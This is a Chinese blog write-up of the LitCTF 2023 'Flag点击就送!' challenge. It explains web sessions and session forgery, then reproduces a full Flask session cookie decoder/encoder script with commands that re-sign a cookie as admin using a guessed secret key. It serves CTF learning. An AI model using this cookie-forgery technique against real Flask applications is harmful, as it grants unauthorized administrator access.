[LitCTF 2023]Flag点击就送!--session伪造

于 2024-04-18 22:00:44 发布
阅读量920 收藏 30
点赞数 21
分类专栏: NSSCTF 文章标签: 服务器 数据库 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75120258/article/details/137875342
版权

【python】Flask之session使用_python flask session-CSDN博客

[LitCTF 2023]Flag点击就送!(cookie伪造)_[litctf 2023]flag点击就送!-CSDN博客

[LitCTF 2023]Flag点击就送!

打开环境,输入1看一下

继续点击拿flag

他提示只有管理员才能拿到flag

 输入admin看一下

还是不行,但是我们在cookie里发现了东西:

session=eyJuYW1lIjoiMSJ9.Zh966A.NxRd8ILBNVdX5EZWUDtMS0J7vrQ

想到了session伪造

知识点

关于session

session是计算机科学中的一个重要概念,通常用于描述客户端与服务器之间的交互过程。在网络应用程序中,会话通常用来跟踪用户在一段时间内的活动状态。

在Web开发中,会话通常指的是服务器上存储的关于特定用户会话状态的信息。这些信息可以包括用户的登录状态、购物车内容、个性化设置等。会话通过使用会话标识符来区分不同的用户,这个标识符通常是通过cookie或URL参数来传递的。

session可以存储在服务器的内存中、数据库中或者是文件系统中。一般来说,会话数据的存储位置会根据应用程序的需求和性能要求来确定。

使用session能够使得应用程序在用户交互过程中保持状态,并且可以实现用户认证、授权、跟踪用户活动等功能。但是需要注意的是,会话数据的安全性是非常重要的,特别是涉及到用户隐私信息的存储和传输时,需要采取适当的安全措施来保护用户数据的安全。

session的作用主要包括以下几个方面:

1. 用户身份认证和授权管理:会话可以用于跟踪用户的登录状态,确保用户在访问受限资源时能够被正确认证和授权。通过会话,服务器可以知道用户是否已经登录,以及用户拥有的权限是什么。

2. 状态管理:会话可以用来跟踪用户在应用程序中的活动状态。例如,购物车中的商品、表单中已填写的数据等都可以存储在会话中,以便用户在浏览不同页面时保持一致的状态。

3. 个性化设置:应用程序可以根据用户的偏好和历史行为来提供个性化的服务。通过会话,可以存储用户的偏好设置,以便在用户下次访问时能够提供相应的个性化体验。

4. 跟踪用户活动:通过记录会话信息,可以了解用户在应用程序中的行为和活动轨迹。这对于分析用户行为、优化用户体验以及改进产品功能都是非常有价值的。

5. 安全性:在某些情况下,会话可以增强应用程序的安全性。例如,可以使用会话令牌来防止跨站请求伪造(CSRF)攻击,或者使用会话来限制用户的登录尝试次数以防止暴力破解密码。

总的来说,会话在Web应用程序中扮演着非常重要的角色,可以帮助应用程序管理用户状态、提供个性化服务、跟踪用户活动等,从而提升用户体验和应用程序的安全性。

由于http协议是一个无状态的协议,也就是说同一个用户第一次请求和第二次请求是完全没有关系的,但是现在的网站基本上有登录使用的功能,这就要求必须实现有状态,而session机制实现的就是这个功能。
用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;这段状态信息分配了一个唯一的标识符用来标识用户的身份,将其保存在响应对象的cookie中;当第二次请求时,解析cookie中的标识符,拿到标识符后去session找到对应的用户的信息。

 关于session伪造:

session伪造是一种网络攻击技术,攻击者通过各种手段获取合法用户的会话标识符,然后利用这些标识符来冒充合法用户与服务器进行通信。这种攻击通常用于获取用户的权限、窃取用户的个人信息,或者执行其他恶意操作。

 session伪造攻击是一种非常流行的针对session的攻击方式.它之所以流行的主要原因是:它是一个攻击者获得一个有效的SESSION ID(标识符)最简单的方法,使用这种方法,可以模仿当前用户的SESSION ID,伪装成这个用户,然后进一步进行SESSION劫持攻击。

会话伪造的主要方式包括:

  1. 会话劫持(Session Hijacking): 攻击者通过监视网络流量或其他手段获取合法用户的会话标识符,然后利用这些标识符来伪装成合法用户与服务器进行通信。这可能涉及到拦截网络通信、窃取cookie等手段。

  2. 会话固定(Session Fixation): 攻击者通过在用户登录之前或之后植入会话标识符,使得用户最终使用的会话标识符与攻击者控制的会话标识符相同。这样一来,攻击者可以使用控制的会话标识符来伪装成用户与服务器进行通信。

  3. 会话劫持工具: 攻击者利用特殊软件或工具来获取、修改或注入会话标识符,以执行会话伪造攻击。这些工具通常包括网络抓包工具、代理服务器、Cookie编辑器等。

根据题目给了提示,这题的web框架为flask框架

关于flask框架中session的存储方式:

flask session的储存方式:

第一种方式:直接存在客户端的cookies中

第二种方式:存储在服务端,如:redis,memcached,mysql,file,mongodb等等,存在flask-session第三方库,flask的session可以保存在客户端的cookie中,那么就会产生一定的安全问题。

flask框架的session若存储在客户端,就需要解决session被恶意纂改的问题,而flask通过一个secret_key,也就是密钥对数据进行签名来防止session被纂改。

flask的session格式:

flask的session格式一般是由base64加密的Session数据(经过了json、zlib压缩处理的字符串) 、时间戳 、签名组成的。

继续做题

我们使用脚本对session进行解密

import sys
import zlib
from itsdangerous import base64_decode
import ast
 
# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3:  # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else:  # > 3.4
    from abc import ABC, abstractmethod
 
# Lib for argument parsing
import argparse
 
# external Imports
from flask.sessions import SecureCookieSessionInterface
 
 
class MockApp(object):
 
    def __init__(self, secret_key):
        self.secret_key = secret_key
 
 
if sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
 
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
 
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
 
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value
 
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
 
                    data = payload.split(".")[0]
 
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
 
                    return data
                else:
                    app = MockApp(secret_key)
 
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
 
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else:  # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)
 
                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)
 
                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
 
        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value
 
                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]
 
                    data = payload.split(".")[0]
 
                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)
 
                    return data
                else:
                    app = MockApp(secret_key)
 
                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)
 
                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
 
if __name__ == "__main__":
    # Args are only relevant for __main__ usage
 
    ## Description for help
    parser = argparse.ArgumentParser(
        description='Flask Session Cookie Decoder/Encoder',
        epilog="Author : Wilson Sumanang, Alexandre ZANNI")
 
    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
 
    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                               help='Session cookie structure', required=True)
 
    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                               help='Session cookie value', required=True)
 
    ## get args
    args = parser.parse_args()
 
    ## find the option chosen
    if (args.subcommand == 'encode'):
        if (args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif (args.subcommand == 'decode'):
        if (args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value, args.secret_key))
        elif (args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

脚本使用方法:
解密:python session.py decode -s "secret_key" -c "需要解密的session值"
加密:python session.py encode -s "secret_key" -t "需要加密的session值"

这儿看了大佬们的WP发现他们都是盲猜的secret_key,哈哈 secret_key为LitCTF

在kali里使用脚本

python session.py decode -s "LitCTF" -c "eyJuYW1lIjoiMSJ9.Zh966A.NxRd8ILBNVdX5EZWUDtMS0J7vrQ"

 解密得到{'name':'1'},这种输出格式是json格式存储

关于json格式存储:

因为说了只有管理员才能得到flag,那我们将name伪造为admin,再进行加密

python session.py encode -s "LitCTF" -t '{"name":"admin"}'

得到

eyJuYW1lIjoiYWRtaW4ifQ.Zh-DXA.4K0tFAjzfBu8ikDQVcKLO52ObwM

然后打开hackbar将我们伪造的session传上去,拿到flag

是小航呀~
关注
  • 21
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023LitCTF web组wp
m0_74160536的博客
05-17 1165
1、导弹迷踪2、1zjs3、php是世界上最好的语言!!4、Ping5、我Flag呢?7、作业管理系统8、Vim yyds10、这是什么?SQL!注一下!11、Flag点击!12、就当无事发生13、彩蛋。
CTF-6#SYSTEM!POWER!-WP
10-23
输入mstsc,输入目标地址,点击连接,输入刚刚创建的账号密码,进入C盘,看到目标文件,提交flag! 总结 SYSTEM!POWER!WP题目的主要目的是在对方的服务器上创建一个账号,并获取-flag。我们使用菜刀连接到服务器...
[LitCTF 2023]Flag点击!(cookie伪造
Welcome To Myon'Blog !
05-22 2295
cookie伪造session、flask、Python、json
[LitCTF 2023]Flag点击
最新发布
weixin_74020633的博客
03-12 401
写这个主要是见识到了两个新的东西,一个是session,一个是flask-session加密解密那么主要是学习到session,另外一个其实是一个小工具,在python3或者python2环境下运行。
LitCTF2023 郑州轻工业大学网络安全赛--web方向
qq_44640313的博客
05-18 706
LitCTF2023--web方向wp
第 14 章 防御会话伪造
weixin_34210740的博客
07-13 134
第14章防御会话伪造 14.1.***场景 session fixation会话伪造***是一个蛮婉转的过程。 比如,当我要是使用session fixation***你的时候,首先访问这个网站,网站会创建一个会话,这时我可以把附有jsessionid的url发给你。http://unsafe/index.jsp;jsessio...
CTF-7#GET THE PASS!-WP
10-23
-WP 本文将详细介绍 CTF-7#GET THE PASS!WP 竞赛的解决方案,包括工具的使用、上传和执行、获取管理员账户名和密码、修改 ACL 权限、打开文件和获取 flag 等。 一、工具介绍 在本次 CTF 竞赛中,我们需要使用一...
flask-session-cookie-manager-master.zip
09-05
通过使用这个工具,CTF参与者可以模拟攻击和防御session,学习如何防止session伪造,提升对Web应用安全的理解。此外,对于开发者来说,这也能帮助他们在实际开发中更好地保护用户数据,增强应用的安全性。 综上所述...
country-flag-emoji:国家代码列表及其标志表情符号
02-05
国旗表情符号 国家代码列表及其标志表情符号。 安装 $ npm install country-flag-...-- Or the minified version --> < script src =" https://unpkg.com/country-flag-emoji@latest/dist/country-flag-emoj
DSP-experiment-for-DMA-TIMER-FLAG.rar_TIMER-FLAG_dma_dmatimer_ds
09-22
这里有实验所用到的源代码和实验报告,对同学们非常有用。。。实验报告给大家作为参考 简介: 实验目的 熟练掌握外部中断原理、外部中断响应方式及对DMA传输进行中断控制原理。 2. 实验原理: 根据外部中断产生原理...
LitCTF-2023-web部分
m0_74097148的博客
05-18 1877
也有多种解法,当然如果上传有黑名单限制 但是远程下载没有 则可以用远程下载去下载PHP木马文件,然后剩余的步骤和上传木马的操作一样 不多做说明。并且题目提示我们只有username, password两列, 不需要group by去判断列数了。输入如下图的内容, 下载后点击编辑文件即可看到flag。如果想要了解更多关于http头部的信息可以参考。
java防止session伪造攻击_spring security防御会话伪造session攻击
weixin_31889919的博客
02-13 757
1.攻击场景session fixation会话伪造攻击是一个蛮婉转的过程。比如,当我要是使用session fixation攻击你的时候,首先访问这个网站,网站会创建一个会话,这时我可以把附有jsessionid的url发给你。http://unsafe/index.jsp;jsessionid=1pjztz08i2u4i你使用这个网址访问网站,结果你和我就会公用同一个jsessionid了...
Spring Securtity (九)会话固定攻击和跨站请求伪造
weixin_43189971的博客
07-20 736
1.会话固定攻击概念 2.跨站请求伪造概念 2.1.csrf令牌 2.2.js在其中做了什么
LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分
Aluxian_的博客
05-14 6731
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF
[LitCTF 2023]刷题记录
rev1ve的博客
05-17 845
提示我们不是来自于pornhub.com,利用Referer。发现为文件上传,直接传php发现成功(啥过滤都没有)F12一下发现提示admin,admin,直接登录。题目提示vim编辑器,用kali打开文件。发现题目已经告诉我们sql语句的闭合方式。直接去/.index.php.swp下。我们ping一下,127.0.0.1。直接在game.js找到flag。我们得伪造admin,加密一下。打开题目,直接js找flag。发现有过滤,要绕过前端检测。再次输入命令,得到flag。找了半天,发现是改过的。
刷题记录 【LitCTF 2023】导弹迷踪
qq_74414939的博客
05-18 737
根据题目提示,需要通过6关才能拿到flag。于是点击进去,进入之后是下面这个页面。但是这个游戏也忒难了,玩了几次都没能过6关。在页面的源码里面看了好一会儿,也没看见什么flag。于是我们换个思路,去看看其他文件。点击查看器右边的调试器,发现在src目录下面有一些js文件,于是我们逐一查看。终于在game.js里面发现了flag。将其改为NSSCTF形式即可。于是按照惯例,我们先通过F2打开源代码看看。(以Firefox为例)不过一般来说,拿flag都是不用玩游戏的。
CTFshow_年CTF 2023
weixin_45908624的博客
01-28 797
_年CTF
LitCTF2023 Reverse 题解及复现
OrientalGlass的博客
05-14 2458
使用解包工具时要注意环境问题,这题是python3.8编写的,所以要用python3.8的环境,否则会缺少输出文件,建议使用anaconda管理python版本。关键代码是最后一段对flag的操作,不过这里可能是有意为之或者是反编译的问题,意思应该是flag[i]和flag[i+1]的数据异或后互换。经典的base64换表,第10和11行作用重复,12行也没有实际作用,此处的base表根本没有变化。关键就在于Probee代码中调用了check函数,该函数定义在ch中,分析程序逻辑不难写出解题脚本。
while (( ! -f "$flag1") || (! -f "$flag2" ) || (! -f "$flag3" )) 中!是什么意思
07-15
在给定的代码中,"!" 符号表示逻辑非(logical NOT)操作符。它用于取反一个条件的结果。在这种情况下,"!" 用于取反 `-f` 命令的结果。 `-f` 是一个用于检查文件是否存在并且是一个常规文件的条件。因此,`! -f "$flag1"` 的意思是判断文件 `$flag1` 是否不存在或者不是一个常规文件。 整个表达式 `(! -f "$flag1") || (! -f "$flag2" ) || (! -f "$flag3" )` 的意思是只要有一个文件 `$flag1`、`$flag2` 或者 `$flag3` 不存在或者不是一个常规文件,条件就为真。换句话说,只有当这三个文件都存在并且都是常规文件时,条件才为假。 这个表达式通常用于循环语句中,当其中任何一个文件不存在或者不是常规文件时,循环会一直执行。一旦所有的文件都存在并且都是常规文件,循环就会退出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值